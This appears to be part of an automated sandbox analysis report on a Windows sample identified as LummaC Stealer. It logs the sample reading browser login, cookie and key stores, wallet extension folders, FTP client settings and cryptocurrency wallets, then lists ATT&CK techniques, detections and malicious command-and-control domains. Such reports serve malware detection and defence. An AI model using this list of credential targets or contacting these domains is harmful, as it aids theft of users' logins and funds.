                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1603193401.000000000115A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1603110801.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pPizCGDvrx.exe PID: 7392, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: pPizCGDvrx.exe PID: 7392, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		34
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory751
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager34
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                pPizCGDvrx.exe58%ReversingLabsWin32.Trojan.Symmi
                pPizCGDvrx.exe100%AviraTR/Crypt.XPACK.Gen
                pPizCGDvrx.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://grannyejh.lat/H100%Avira URL Cloudmalware
                https://grannyejh.lat:443/apitA100%Avira URL Cloudmalware
                https://grannyejh.lat/s100%Avira URL Cloudmalware
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.0%Avira URL Cloudsafe
                https://grannyejh.lat/?100%Avira URL Cloudmalware
                https://grannyejh.lat/apiz0y100%Avira URL Cloudmalware
                https://grannyejh.lat/apigsA100%Avira URL Cloudmalware
                https://grannyejh.lat/=100%Avira URL Cloudmalware
                https://grannyejh.lat/apiz100%Avira URL Cloudmalware
                https://grannyejh.lat/P100%Avira URL Cloudmalware
                https://grannyejh.lat/apiG100%Avira URL Cloudmalware
                https://grannyejh.lat/api6100%Avira URL Cloudmalware
                https://grannyejh.lat/(100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                grannyejh.lat
                		172.67.179.109
                		truefalse
                  		high
                  sweepyribs.lat
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

